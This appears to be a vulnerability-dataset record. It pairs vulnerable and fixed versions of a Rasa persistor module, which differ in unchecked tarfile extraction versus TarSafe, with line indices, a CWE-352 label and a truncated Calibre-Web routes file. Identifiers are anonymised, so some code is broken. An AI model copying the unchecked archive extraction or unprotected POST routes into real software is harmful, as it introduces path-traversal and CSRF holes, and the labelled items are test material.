if VAR_1:
try:
VAR_28 = rasa.shared.utils.common.class_from_module_path(VAR_1)
return VAR_28()
except ImportError:
raise ImportError(
f"Unknown model VAR_28 {VAR_1}. Please make sure to "
"either use an included model VAR_28 (`aws`, `gcs` "
"or `azure`) or specify the module path to an external "
"model VAR_28."
)
return None
class CLASS_0(abc.ABC):
def FUNC_1(self, VAR_2: Text, VAR_3: Text) -> None:
if not os.path.isdir(VAR_2):
raise ValueError(f"Target directory '{VAR_2}' not found.")
VAR_13, VAR_14 = self._compress(VAR_2, VAR_3)
self._persist_tar(VAR_13, VAR_14)
def FUNC_2(self, VAR_3: Text, VAR_4: Text) -> None:
VAR_21 = VAR_3
if not VAR_3.endswith("tar.gz"):
VAR_21 = self._tar_name(VAR_3)
self._retrieve_tar(VAR_21)
self._decompress(os.path.basename(VAR_21), VAR_4)
@abc.abstractmethod
def FUNC_3(self, VAR_5: Text) -> Text:
raise NotImplementedError
@abc.abstractmethod
def FUNC_4(self, VAR_6: Text, VAR_7: Text) -> None: # noqa: F841
raise NotImplementedError
def FUNC_5(self, VAR_2: Text, VAR_3: Text) -> Tuple[Text, Text]:
import tempfile
VAR_22 = tempfile.mkdtemp()
VAR_23 = self._tar_name(VAR_3, VAR_8=False)
VAR_21 = shutil.make_archive(
os.path.join(VAR_22, VAR_23),
"gztar",
root_dir=VAR_2,
base_dir=".",
)
VAR_13 = os.path.basename(VAR_21)
return VAR_13, VAR_21
@staticmethod
def FUNC_6(VAR_3: Text, VAR_8: bool = True) -> Text:
VAR_24 = ".tar.gz" if VAR_8 else ""
return f"{VAR_3}{VAR_24}"
@staticmethod
def FUNC_7(VAR_9: Text, VAR_4: Text) -> None:
with tarfile.open(VAR_9, "r:gz") as tar:
tar.extractall(VAR_4) # target dir will be created if it not exists
class CLASS_1(CLASS_0):
def __init__(
self,
VAR_10: Text,
VAR_11: Optional[Text] = None,
VAR_12: Optional[Text] = None,
) -> None:
import boto3
super().__init__()
self.s3 = boto3.resource(
"s3", VAR_11=endpoint_url, VAR_12=region_name
)
self._ensure_bucket_exists(VAR_10, VAR_12)
self.bucket_name = VAR_10
self.bucket = self.s3.Bucket(VAR_10)
def FUNC_8(
self, VAR_10: Text, VAR_12: Optional[Text] = None
) -> None:
import boto3
import botocore
if not VAR_12:
region_name = boto3.DEFAULT_SESSION.region_name
VAR_25 = {"LocationConstraint": VAR_12}
try:
self.s3.create_bucket(
Bucket=VAR_10, CreateBucketConfiguration=VAR_25
)
except botocore.exceptions.ClientError:
pass # bucket already exists
def FUNC_4(self, VAR_13: Text, VAR_14: Text) -> None:
with open(VAR_14, "rb") as f:
self.s3.Object(self.bucket_name, VAR_13).put(Body=f)
def FUNC_3(self, VAR_15: Text) -> None:
VAR_21 = os.path.basename(VAR_15)
with open(VAR_21, "wb") as f:
self.bucket.download_fileobj(VAR_15, f)
class CLASS_2(CLASS_0):
def __init__(self, VAR_10: Text) -> None:
from google.cloud import storage
super().__init__()
self.storage_client = storage.Client()
self._ensure_bucket_exists(VAR_10)
self.bucket_name = VAR_10
self.bucket = self.storage_client.bucket(VAR_10)
def FUNC_8(self, VAR_10: Text) -> None:
from google.cloud import exceptions
try:
self.storage_client.create_bucket(VAR_10)
except exceptions.Conflict:
pass
def FUNC_4(self, VAR_13: Text, VAR_14: Text) -> None:
VAR_26 = self.bucket.blob(VAR_13)
VAR_26.upload_from_filename(VAR_14)
def FUNC_3(self, VAR_16: Text) -> None:
VAR_26 = self.bucket.blob(VAR_16)
VAR_26.download_to_filename(VAR_16)
class CLASS_3(CLASS_0):
def __init__(
self, VAR_17: Text, VAR_18: Text, VAR_19: Text
) -> None:
from azure.storage.blob import BlobServiceClient
super().__init__()
self.blob_service = BlobServiceClient(
account_url=f"https://{VAR_18}.blob.core.windows.net/",
credential=VAR_19,
)
self._ensure_container_exists(VAR_17)
self.container_name = VAR_17
def FUNC_9(self, VAR_20: Text) -> None:
from azure.core.exceptions import ResourceExistsError
try:
self.blob_service.create_container(VAR_20)
except ResourceExistsError:
pass
def FUNC_10(self) -> "ContainerClient":
return self.blob_service.get_container_client(self.container_name)
def FUNC_4(self, VAR_13: Text, VAR_14: Text) -> None:
with open(VAR_14, "rb") as data:
self._container_client().upload_blob(VAR_1=VAR_13, data=data)
def FUNC_3(self, VAR_16: Text) -> None:
VAR_27 = self._container_client().get_blob_client(VAR_16)
with open(VAR_16, "wb") as VAR_26:
VAR_29 = VAR_27.download_blob()
VAR_26.write(VAR_29.readall())
| import abc
import logging
import os
import shutil
from tarsafe import TarSafe
from typing import Optional, Text, Tuple, TYPE_CHECKING
import rasa.shared.utils.common
import rasa.utils.common
if TYPE_CHECKING:
from azure.storage.blob import ContainerClient
VAR_0 = logging.getLogger(__name__)
def FUNC_0(VAR_1: Text) -> Optional["Persistor"]:
if VAR_1 == "aws":
return CLASS_1(
os.environ.get("BUCKET_NAME"), os.environ.get("AWS_ENDPOINT_URL")
)
if VAR_1 == "gcs":
return CLASS_2(os.environ.get("BUCKET_NAME"))
if VAR_1 == "azure":
return CLASS_3(
os.environ.get("AZURE_CONTAINER"),
os.environ.get("AZURE_ACCOUNT_NAME"),
os.environ.get("AZURE_ACCOUNT_KEY"),
)
if VAR_1:
try:
VAR_28 = rasa.shared.utils.common.class_from_module_path(VAR_1)
return VAR_28()
except ImportError:
raise ImportError(
f"Unknown model VAR_28 {VAR_1}. Please make sure to "
"either use an included model VAR_28 (`aws`, `gcs` "
"or `azure`) or specify the module path to an external "
"model VAR_28."
)
return None
class CLASS_0(abc.ABC):
def FUNC_1(self, VAR_2: Text, VAR_3: Text) -> None:
if not os.path.isdir(VAR_2):
raise ValueError(f"Target directory '{VAR_2}' not found.")
VAR_13, VAR_14 = self._compress(VAR_2, VAR_3)
self._persist_tar(VAR_13, VAR_14)
def FUNC_2(self, VAR_3: Text, VAR_4: Text) -> None:
VAR_21 = VAR_3
if not VAR_3.endswith("tar.gz"):
VAR_21 = self._tar_name(VAR_3)
self._retrieve_tar(VAR_21)
self._decompress(os.path.basename(VAR_21), VAR_4)
@abc.abstractmethod
def FUNC_3(self, VAR_5: Text) -> Text:
raise NotImplementedError
@abc.abstractmethod
def FUNC_4(self, VAR_6: Text, VAR_7: Text) -> None: # noqa: F841
raise NotImplementedError
def FUNC_5(self, VAR_2: Text, VAR_3: Text) -> Tuple[Text, Text]:
import tempfile
VAR_22 = tempfile.mkdtemp()
VAR_23 = self._tar_name(VAR_3, VAR_8=False)
VAR_21 = shutil.make_archive(
os.path.join(VAR_22, VAR_23),
"gztar",
root_dir=VAR_2,
base_dir=".",
)
VAR_13 = os.path.basename(VAR_21)
return VAR_13, VAR_21
@staticmethod
def FUNC_6(VAR_3: Text, VAR_8: bool = True) -> Text:
VAR_24 = ".tar.gz" if VAR_8 else ""
return f"{VAR_3}{VAR_24}"
@staticmethod
def FUNC_7(VAR_9: Text, VAR_4: Text) -> None:
with TarSafe.open(VAR_9, "r:gz") as tar:
tar.extractall(VAR_4) # target dir will be created if it not exists
class CLASS_1(CLASS_0):
def __init__(
self,
VAR_10: Text,
VAR_11: Optional[Text] = None,
VAR_12: Optional[Text] = None,
) -> None:
import boto3
super().__init__()
self.s3 = boto3.resource(
"s3", VAR_11=endpoint_url, VAR_12=region_name
)
self._ensure_bucket_exists(VAR_10, VAR_12)
self.bucket_name = VAR_10
self.bucket = self.s3.Bucket(VAR_10)
def FUNC_8(
self, VAR_10: Text, VAR_12: Optional[Text] = None
) -> None:
import boto3
import botocore
if not VAR_12:
region_name = boto3.DEFAULT_SESSION.region_name
VAR_25 = {"LocationConstraint": VAR_12}
try:
self.s3.create_bucket(
Bucket=VAR_10, CreateBucketConfiguration=VAR_25
)
except botocore.exceptions.ClientError:
pass # bucket already exists
def FUNC_4(self, VAR_13: Text, VAR_14: Text) -> None:
with open(VAR_14, "rb") as f:
self.s3.Object(self.bucket_name, VAR_13).put(Body=f)
def FUNC_3(self, VAR_15: Text) -> None:
VAR_21 = os.path.basename(VAR_15)
with open(VAR_21, "wb") as f:
self.bucket.download_fileobj(VAR_15, f)
class CLASS_2(CLASS_0):
def __init__(self, VAR_10: Text) -> None:
from google.cloud import storage
super().__init__()
self.storage_client = storage.Client()
self._ensure_bucket_exists(VAR_10)
self.bucket_name = VAR_10
self.bucket = self.storage_client.bucket(VAR_10)
def FUNC_8(self, VAR_10: Text) -> None:
from google.cloud import exceptions
try:
self.storage_client.create_bucket(VAR_10)
except exceptions.Conflict:
pass
def FUNC_4(self, VAR_13: Text, VAR_14: Text) -> None:
VAR_26 = self.bucket.blob(VAR_13)
VAR_26.upload_from_filename(VAR_14)
def FUNC_3(self, VAR_16: Text) -> None:
VAR_26 = self.bucket.blob(VAR_16)
VAR_26.download_to_filename(VAR_16)
class CLASS_3(CLASS_0):
def __init__(
self, VAR_17: Text, VAR_18: Text, VAR_19: Text
) -> None:
from azure.storage.blob import BlobServiceClient
super().__init__()
self.blob_service = BlobServiceClient(
account_url=f"https://{VAR_18}.blob.core.windows.net/",
credential=VAR_19,
)
self._ensure_container_exists(VAR_17)
self.container_name = VAR_17
def FUNC_9(self, VAR_20: Text) -> None:
from azure.core.exceptions import ResourceExistsError
try:
self.blob_service.create_container(VAR_20)
except ResourceExistsError:
pass
def FUNC_10(self) -> "ContainerClient":
return self.blob_service.get_container_client(self.container_name)
def FUNC_4(self, VAR_13: Text, VAR_14: Text) -> None:
with open(VAR_14, "rb") as data:
self._container_client().upload_blob(VAR_1=VAR_13, data=data)
def FUNC_3(self, VAR_16: Text) -> None:
VAR_27 = self._container_client().get_blob_client(VAR_16)
with open(VAR_16, "wb") as VAR_26:
VAR_29 = VAR_27.download_blob()
VAR_26.write(VAR_29.readall())
| [
7,
10,
13,
15,
16,
19,
29,
48,
49,
52,
57,
60,
64,
66,
68,
71,
76,
81,
85,
96,
99,
102,
105,
108,
109,
112,
114,
122,
130,
136,
139,
141,
148,
151,
154,
160,
161,
164,
166,
169,
171,
174,
177,
180,
184,
186,
189,
192,
195,
198,
199,
202,
207,
209,
214,
217,
220,
224,
226,
229,
234,
238,
242,
18,
19,
20,
21,
22,
51,
111,
112,
113,
163,
164,
165,
201,
54,
62,
74,
79,
83,
150,
156,
188,
194,
231,
236
] | [
7,
10,
13,
15,
16,
19,
29,
48,
49,
52,
57,
60,
64,
66,
68,
71,
76,
81,
85,
96,
99,
102,
105,
108,
109,
112,
114,
122,
130,
136,
139,
141,
148,
151,
154,
160,
161,
164,
166,
169,
171,
174,
177,
180,
184,
186,
189,
192,
195,
198,
199,
202,
207,
209,
214,
217,
220,
224,
226,
229,
234,
238,
242,
18,
19,
20,
21,
22,
51,
111,
112,
113,
163,
164,
165,
201,
54,
62,
74,
79,
83,
150,
156,
188,
194,
231,
236
] |
3CWE-352
| # -*- coding: utf-8 -*-
# This file is part of the Calibre-Web (https://github.com/janeczku/calibre-web)
# Copyright (C) 2018-2019 OzzieIsaacs, cervinko, jkrehm, bodybybuddha, ok11,
# andy29485, idalin, Kyosfonica, wuqi, Kennyl, lemmsh,
# falgh1, grunjol, csitko, ytils, xybydy, trasba, vrabe,
# ruben-herold, marblepebble, JackED42, SiphonSquirrel,
# apetresc, nanu-c, mutschler
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
from __future__ import division, print_function, unicode_literals
import os
from datetime import datetime
import json
import mimetypes
import chardet # dependency of requests
import copy
from babel.dates import format_date
from babel import Locale as LC
from babel.core import UnknownLocaleError
from flask import Blueprint, jsonify
from flask import request, redirect, send_from_directory, make_response, flash, abort, url_for
from flask import session as flask_session
from flask_babel import gettext as _
from flask_login import login_user, logout_user, login_required, current_user
from sqlalchemy.exc import IntegrityError, InvalidRequestError, OperationalError
from sqlalchemy.sql.expression import text, func, false, not_, and_, or_
from sqlalchemy.orm.attributes import flag_modified
from sqlalchemy.sql.functions import coalesce
from .services.worker import WorkerThread
from werkzeug.datastructures import Headers
from werkzeug.security import generate_password_hash, check_password_hash
from . import constants, logger, isoLanguages, services
from . import babel, db, ub, config, get_locale, app
from . import calibre_db
from .gdriveutils import getFileFromEbooksFolder, do_gdrive_download
from .helper import check_valid_domain, render_task_status, check_email, check_username, \
get_cc_columns, get_book_cover, get_download_link, send_mail, generate_random_password, \
send_registration_mail, check_send_to_kindle, check_read_formats, tags_filters, reset_password, valid_email
from .pagination import Pagination
from .redirect import redirect_back
from .usermanagement import login_required_if_no_ano
from .render_template import render_title_template
feature_support = {
'ldap': bool(services.ldap),
'goodreads': bool(services.goodreads_support),
'kobo': bool(services.kobo)
}
try:
from .oauth_bb import oauth_check, register_user_with_oauth, logout_oauth_user, get_oauth_status
feature_support['oauth'] = True
except ImportError:
feature_support['oauth'] = False
oauth_check = {}
try:
from functools import wraps
except ImportError:
pass # We're not using Python 3
try:
from natsort import natsorted as sort
except ImportError:
sort = sorted # Just use regular sort then, may cause issues with badly named pages in cbz/cbr files
@app.after_request
def add_security_headers(resp):
resp.headers['Content-Security-Policy'] = "default-src 'self' 'unsafe-inline' 'unsafe-eval';"
if request.endpoint == "editbook.edit_book":
resp.headers['Content-Security-Policy'] += "img-src * data:"
resp.headers['X-Content-Type-Options'] = 'nosniff'
resp.headers['X-Frame-Options'] = 'SAMEORIGIN'
resp.headers['X-XSS-Protection'] = '1; mode=block'
resp.headers['Strict-Transport-Security'] = 'max-age=31536000; includeSubDomains'
# log.debug(request.full_path)
return resp
web = Blueprint('web', __name__)
log = logger.create()
# ################################### Login logic and rights management ###############################################
def download_required(f):
@wraps(f)
def inner(*args, **kwargs):
if current_user.role_download():
return f(*args, **kwargs)
abort(403)
return inner
def viewer_required(f):
@wraps(f)
def inner(*args, **kwargs):
if current_user.role_viewer():
return f(*args, **kwargs)
abort(403)
return inner
# ################################### data provider functions #########################################################
@web.route("/ajax/emailstat")
@login_required
def get_email_status_json():
tasks = WorkerThread.getInstance().tasks
return jsonify(render_task_status(tasks))
@web.route("/ajax/bookmark/<int:book_id>/<book_format>", methods=['POST'])
@login_required
def bookmark(book_id, book_format):
bookmark_key = request.form["bookmark"]
ub.session.query(ub.Bookmark).filter(and_(ub.Bookmark.user_id == int(current_user.id),
ub.Bookmark.book_id == book_id,
ub.Bookmark.format == book_format)).delete()
if not bookmark_key:
ub.session_commit()
return "", 204
lbookmark = ub.Bookmark(user_id=current_user.id,
book_id=book_id,
format=book_format,
bookmark_key=bookmark_key)
ub.session.merge(lbookmark)
ub.session_commit("Bookmark for user {} in book {} created".format(current_user.id, book_id))
return "", 201
@web.route("/ajax/toggleread/<int:book_id>", methods=['POST'])
@login_required
def toggle_read(book_id):
if not config.config_read_column:
book = ub.session.query(ub.ReadBook).filter(and_(ub.ReadBook.user_id == int(current_user.id),
ub.ReadBook.book_id == book_id)).first()
if book:
if book.read_status == ub.ReadBook.STATUS_FINISHED:
book.read_status = ub.ReadBook.STATUS_UNREAD
else:
book.read_status = ub.ReadBook.STATUS_FINISHED
else:
readBook = ub.ReadBook(user_id=current_user.id, book_id = book_id)
readBook.read_status = ub.ReadBook.STATUS_FINISHED
book = readBook
if not book.kobo_reading_state:
kobo_reading_state = ub.KoboReadingState(user_id=current_user.id, book_id=book_id)
kobo_reading_state.current_bookmark = ub.KoboBookmark()
kobo_reading_state.statistics = ub.KoboStatistics()
book.kobo_reading_state = kobo_reading_state
ub.session.merge(book)
ub.session_commit("Book {} readbit toggled".format(book_id))
else:
try:
calibre_db.update_title_sort(config)
book = calibre_db.get_filtered_book(book_id)
read_status = getattr(book, 'custom_column_' + str(config.config_read_column))
if len(read_status):
read_status[0].value = not read_status[0].value
calibre_db.session.commit()
else:
cc_class = db.cc_classes[config.config_read_column]
new_cc = cc_class(value=1, book=book_id)
calibre_db.session.add(new_cc)
calibre_db.session.commit()
except (KeyError, AttributeError):
log.error(u"Custom Column No.%d is not existing in calibre database", config.config_read_column)
return "Custom Column No.{} is not existing in calibre database".format(config.config_read_column), 400
except (OperationalError, InvalidRequestError) as e:
calibre_db.session.rollback()
log.error(u"Read status could not set: %e", e)
return "Read status could not set: {}".format(e), 400
return ""
@web.route("/ajax/togglearchived/<int:book_id>", methods=['POST'])
@login_required
def toggle_archived(book_id):
archived_book = ub.session.query(ub.ArchivedBook).filter(and_(ub.ArchivedBook.user_id == int(current_user.id),
ub.ArchivedBook.book_id == book_id)).first()
if archived_book:
archived_book.is_archived = not archived_book.is_archived
archived_book.last_modified = datetime.utcnow()
else:
archived_book = ub.ArchivedBook(user_id=current_user.id, book_id=book_id)
archived_book.is_archived = True
ub.session.merge(archived_book)
ub.session_commit("Book {} archivebit toggled".format(book_id))
return ""
@web.route("/ajax/view", methods=["POST"])
@login_required_if_no_ano
def update_view():
to_save = request.get_json()
try:
for element in to_save:
for param in to_save[element]:
current_user.set_view_property(element, param, to_save[element][param])
except Exception as ex:
log.error("Could not save view_settings: %r %r: %e", request, to_save, ex)
return "Invalid request", 400
return "1", 200
'''
@web.route("/ajax/getcomic/<int:book_id>/<book_format>/<int:page>")
@login_required
def get_comic_book(book_id, book_format, page):
book = calibre_db.get_book(book_id)
if not book:
return "", 204
else:
for bookformat in book.data:
if bookformat.format.lower() == book_format.lower():
cbr_file = os.path.join(config.config_calibre_dir, book.path, bookformat.name) + "." + book_format
if book_format in ("cbr", "rar"):
if feature_support['rar'] == True:
rarfile.UNRAR_TOOL = config.config_rarfile_location
try:
rf = rarfile.RarFile(cbr_file)
names = sort(rf.namelist())
extract = lambda page: rf.read(names[page])
except:
# rarfile not valid
log.error('Unrar binary not found, or unable to decompress file %s', cbr_file)
return "", 204
else:
log.info('Unrar is not supported please install python rarfile extension')
# no support means return nothing
return "", 204
elif book_format in ("cbz", "zip"):
zf = zipfile.ZipFile(cbr_file)
names=sort(zf.namelist())
extract = lambda page: zf.read(names[page])
elif book_format in ("cbt", "tar"):
tf = tarfile.TarFile(cbr_file)
names=sort(tf.getnames())
extract = lambda page: tf.extractfile(names[page]).read()
else:
log.error('unsupported comic format')
return "", 204
if sys.version_info.major >= 3:
b64 = codecs.encode(extract(page), 'base64').decode()
else:
b64 = extract(page).encode('base64')
ext = names[page].rpartition('.')[-1]
if ext not in ('png', 'gif', 'jpg', 'jpeg', 'webp'):
ext = 'png'
extractedfile="data:image/" + ext + ";base64," + b64
fileData={"name": names[page], "page":page, "last":len(names)-1, "content": extractedfile}
return make_response(json.dumps(fileData))
return "", 204
'''
# ################################### Typeahead ##################################################################
@web.route("/get_authors_json", methods=['GET'])
@login_required_if_no_ano
def get_authors_json():
return calibre_db.get_typeahead(db.Authors, request.args.get('q'), ('|', ','))
@web.route("/get_publishers_json", methods=['GET'])
@login_required_if_no_ano
def get_publishers_json():
return calibre_db.get_typeahead(db.Publishers, request.args.get('q'), ('|', ','))
@web.route("/get_tags_json", methods=['GET'])
@login_required_if_no_ano
def get_tags_json():
return calibre_db.get_typeahead(db.Tags, request.args.get('q'), tag_filter=tags_filters())
@web.route("/get_series_json", methods=['GET'])
@login_required_if_no_ano
def get_series_json():
return calibre_db.get_typeahead(db.Series, request.args.get('q'))
@web.route("/get_languages_json", methods=['GET'])
@login_required_if_no_ano
def get_languages_json():
query = (request.args.get('q') or '').lower()
language_names = isoLanguages.get_language_names(get_locale())
entries_start = [s for key, s in language_names.items() if s.lower().startswith(query.lower())]
if len(entries_start) < 5:
entries = [s for key, s in language_names.items() if query in s.lower()]
entries_start.extend(entries[0:(5 - len(entries_start))])
entries_start = list(set(entries_start))
json_dumps = json.dumps([dict(name=r) for r in entries_start[0:5]])
return json_dumps
@web.route("/get_matching_tags", methods=['GET'])
@login_required_if_no_ano
def get_matching_tags():
tag_dict = {'tags': []}
q = calibre_db.session.query(db.Books).filter(calibre_db.common_filters(True))
calibre_db.session.connection().connection.connection.create_function("lower", 1, db.lcase)
author_input = request.args.get('author_name') or ''
title_input = request.args.get('book_title') or ''
include_tag_inputs = request.args.getlist('include_tag') or ''
exclude_tag_inputs = request.args.getlist('exclude_tag') or ''
q = q.filter(db.Books.authors.any(func.lower(db.Authors.name).ilike("%" + author_input + "%")),
func.lower(db.Books.title).ilike("%" + title_input + "%"))
if len(include_tag_inputs) > 0:
for tag in include_tag_inputs:
q = q.filter(db.Books.tags.any(db.Tags.id == tag))
if len(exclude_tag_inputs) > 0:
for tag in exclude_tag_inputs:
q = q.filter(not_(db.Books.tags.any(db.Tags.id == tag)))
for book in q:
for tag in book.tags:
if tag.id not in tag_dict['tags']:
tag_dict['tags'].append(tag.id)
json_dumps = json.dumps(tag_dict)
return json_dumps
def get_sort_function(sort, data):
order = [db.Books.timestamp.desc()]
if sort == 'stored':
sort = current_user.get_view_property(data, 'stored')
else:
current_user.set_view_property(data, 'stored', sort)
if sort == 'pubnew':
order = [db.Books.pubdate.desc()]
if sort == 'pubold':
order = [db.Books.pubdate]
if sort == 'abc':
order = [db.Books.sort]
if sort == 'zyx':
order = [db.Books.sort.desc()]
if sort == 'new':
order = [db.Books.timestamp.desc()]
if sort == 'old':
order = [db.Books.timestamp]
if sort == 'authaz':
order = [db.Books.author_sort.asc(), db.Series.name, db.Books.series_index]
if sort == 'authza':
order = [db.Books.author_sort.desc(), db.Series.name.desc(), db.Books.series_index.desc()]
if sort == 'seriesasc':
order = [db.Books.series_index.asc()]
if sort == 'seriesdesc':
order = [db.Books.series_index.desc()]
return order
def render_books_list(data, sort, book_id, page):
order = get_sort_function(sort, data)
if data == "rated":
return render_rated_books(page, book_id, order=order)
elif data == "discover":
return render_discover_books(page, book_id)
elif data == "unread":
return render_read_books(page, False, order=order)
elif data == "read":
return render_read_books(page, True, order=order)
elif data == "hot":
return render_hot_books(page)
elif data == "download":
return render_downloaded_books(page, order, book_id)
elif data == "author":
return render_author_books(page, book_id, order)
elif data == "publisher":
return render_publisher_books(page, book_id, order)
elif data == "series":
return render_series_books(page, book_id, order)
elif data == "ratings":
return render_ratings_books(page, book_id, order)
elif data == "formats":
return render_formats_books(page, book_id, order)
elif data == "category":
return render_category_books(page, book_id, order)
elif data == "language":
return render_language_books(page, book_id, order)
elif data == "archived":
return render_archived_books(page, order)
elif data == "search":
term = (request.args.get('query') or '')
offset = int(int(config.config_books_per_page) * (page - 1))
return render_search_results(term, offset, order, config.config_books_per_page)
elif data == "advsearch":
term = json.loads(flask_session['query'])
offset = int(int(config.config_books_per_page) * (page - 1))
return render_adv_search_results(term, offset, order, config.config_books_per_page)
else:
website = data or "newest"
entries, random, pagination = calibre_db.fill_indexpage(page, 0, db.Books, True, order,
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
title=_(u"Books"), page=website)
def render_rated_books(page, book_id, order):
if current_user.check_visibility(constants.SIDEBAR_BEST_RATED):
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db.Books.ratings.any(db.Ratings.rating > 9),
order,
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
id=book_id, title=_(u"Top Rated Books"), page="rated")
else:
abort(404)
def render_discover_books(page, book_id):
if current_user.check_visibility(constants.SIDEBAR_RANDOM):
entries, __, pagination = calibre_db.fill_indexpage(page, 0, db.Books, True, [func.randomblob(2)])
pagination = Pagination(1, config.config_books_per_page, config.config_books_per_page)
return render_title_template('discover.html', entries=entries, pagination=pagination, id=book_id,
title=_(u"Discover (Random Books)"), page="discover")
else:
abort(404)
def render_hot_books(page):
if current_user.check_visibility(constants.SIDEBAR_HOT):
if current_user.show_detail_random():
random = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
.order_by(func.random()).limit(config.config_random_books)
else:
random = false()
off = int(int(config.config_books_per_page) * (page - 1))
all_books = ub.session.query(ub.Downloads, func.count(ub.Downloads.book_id)).order_by(
func.count(ub.Downloads.book_id).desc()).group_by(ub.Downloads.book_id)
hot_books = all_books.offset(off).limit(config.config_books_per_page)
entries = list()
for book in hot_books:
downloadBook = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()).filter(
db.Books.id == book.Downloads.book_id).first()
if downloadBook:
entries.append(downloadBook)
else:
ub.delete_download(book.Downloads.book_id)
numBooks = entries.__len__()
pagination = Pagination(page, config.config_books_per_page, numBooks)
return render_title_template('index.html', random=random, entries=entries, pagination=pagination,
title=_(u"Hot Books (Most Downloaded)"), page="hot")
else:
abort(404)
def render_downloaded_books(page, order, user_id):
if current_user.role_admin():
user_id = int(user_id)
else:
user_id = current_user.id
if current_user.check_visibility(constants.SIDEBAR_DOWNLOAD):
if current_user.show_detail_random():
random = calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
.order_by(func.random()).limit(config.config_random_books)
else:
random = false()
entries, __, pagination = calibre_db.fill_indexpage(page,
0,
db.Books,
ub.Downloads.user_id == user_id,
order,
ub.Downloads, db.Books.id == ub.Downloads.book_id)
for book in entries:
if not calibre_db.session.query(db.Books).filter(calibre_db.common_filters()) \
.filter(db.Books.id == book.id).first():
ub.delete_download(book.id)
user = ub.session.query(ub.User).filter(ub.User.id == user_id).first()
return render_title_template('index.html',
random=random,
entries=entries,
pagination=pagination,
id=user_id,
title=_(u"Downloaded books by %(user)s",user=user.name),
page="download")
else:
abort(404)
def render_author_books(page, author_id, order):
entries, __, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db.Books.authors.any(db.Authors.id == author_id),
[order[0], db.Series.name, db.Books.series_index],
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
if entries is None or not len(entries):
flash(_(u"Oops! Selected book title is unavailable. File does not exist or is not accessible"),
category="error")
return redirect(url_for("web.index"))
if constants.sqlalchemy_version2:
author = calibre_db.session.get(db.Authors, author_id)
else:
author = calibre_db.session.query(db.Authors).get(author_id)
author_name = author.name.replace('|', ',')
author_info = None
other_books = []
if services.goodreads_support and config.config_use_goodreads:
author_info = services.goodreads_support.get_author_info(author_name)
other_books = services.goodreads_support.get_other_books(author_info, entries)
return render_title_template('author.html', entries=entries, pagination=pagination, id=author_id,
title=_(u"Author: %(name)s", name=author_name), author=author_info,
other_books=other_books, page="author")
def render_publisher_books(page, book_id, order):
publisher = calibre_db.session.query(db.Publishers).filter(db.Publishers.id == book_id).first()
if publisher:
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db.Books.publishers.any(db.Publishers.id == book_id),
[db.Series.name, order[0], db.Books.series_index],
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
return render_title_template('index.html', random=random, entries=entries, pagination=pagination, id=book_id,
title=_(u"Publisher: %(name)s", name=publisher.name), page="publisher")
else:
abort(404)
def render_series_books(page, book_id, order):
name = calibre_db.session.query(db.Series).filter(db.Series.id == book_id).first()
if name:
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db.Books.series.any(db.Series.id == book_id),
[order[0]])
return render_title_template('index.html', random=random, pagination=pagination, entries=entries, id=book_id,
title=_(u"Series: %(serie)s", serie=name.name), page="series")
else:
abort(404)
def render_ratings_books(page, book_id, order):
name = calibre_db.session.query(db.Ratings).filter(db.Ratings.id == book_id).first()
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db.Books.ratings.any(db.Ratings.id == book_id),
[order[0]])
if name and name.rating <= 10:
return render_title_template('index.html', random=random, pagination=pagination, entries=entries, id=book_id,
title=_(u"Rating: %(rating)s stars", rating=int(name.rating / 2)), page="ratings")
else:
abort(404)
def render_formats_books(page, book_id, order):
name = calibre_db.session.query(db.Data).filter(db.Data.format == book_id.upper()).first()
if name:
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db.Books.data.any(db.Data.format == book_id.upper()),
[order[0]])
return render_title_template('index.html', random=random, pagination=pagination, entries=entries, id=book_id,
title=_(u"File format: %(format)s", format=name.format), page="formats")
else:
abort(404)
def render_category_books(page, book_id, order):
name = calibre_db.session.query(db.Tags).filter(db.Tags.id == book_id).first()
if name:
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db.Books.tags.any(db.Tags.id == book_id),
[order[0], db.Series.name, db.Books.series_index],
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series)
return render_title_template('index.html', random=random, entries=entries, pagination=pagination, id=book_id,
title=_(u"Category: %(name)s", name=name.name), page="category")
else:
abort(404)
def render_language_books(page, name, order):
try:
lang_name = isoLanguages.get_language_name(get_locale(), name)
except KeyError:
abort(404)
#try:
# cur_l = LC.parse(name)
# lang_name = cur_l.get_language_name(get_locale())
#except UnknownLocaleError:
# try:
# lang_name = _(isoLanguages.get(part3=name).name)
# except KeyError:
# abort(404)
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db.Books.languages.any(db.Languages.lang_code == name),
[order[0]])
return render_title_template('index.html', random=random, entries=entries, pagination=pagination, id=name,
title=_(u"Language: %(name)s", name=lang_name), page="language")
def render_read_books(page, are_read, as_xml=False, order=None):
order = order or []
if not config.config_read_column:
if are_read:
db_filter = and_(ub.ReadBook.user_id == int(current_user.id),
ub.ReadBook.read_status == ub.ReadBook.STATUS_FINISHED)
else:
db_filter = coalesce(ub.ReadBook.read_status, 0) != ub.ReadBook.STATUS_FINISHED
entries, random, pagination = calibre_db.fill_indexpage(page, 0,
db.Books,
db_filter,
order,
db.books_series_link,
db.Books.id == db.books_series_link.c.book,
db.Series,
ub.ReadBook, db.Books.id == ub.ReadBook.book_id)
else:
